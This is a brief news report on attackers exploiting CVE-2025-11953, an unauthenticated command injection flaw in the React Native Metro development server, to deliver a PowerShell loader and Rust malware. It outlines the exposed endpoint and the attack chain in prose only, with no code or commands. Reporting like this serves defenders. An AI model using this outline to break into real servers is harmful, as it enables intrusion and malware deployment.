HACKERS abused a critical flaw in the React Native CLI Metro server, tracked as CVE-2025-11953, to run remote commands and drop Rust malware weeks before public disclosure. The advisory notes that the Metro Development Server binds to external interfaces by default and exposes a command injection endpoint, allowing unauthenticated attackers to send a POST request and execute arbitrary executables, with Windows users able to run arbitrary shell commands.
VulnCheck observed real‑world exploitation of CVE-2025-11953 on 21 December 2025 and again in January, showing attackers kept using it despite the vulnerability’s limited public attention. The exploit delivered a multi‑stage, base64‑encoded PowerShell loader, disabled Microsoft Defender protections, and fetched payloads over raw TCP, culminating in a UPX‑packed Rust payload with basic anti‑analysis features.
The report cautions that exploitation occurred in the wild rather than purely for testing, emphasising the risk posed by production infrastructure becoming reachable.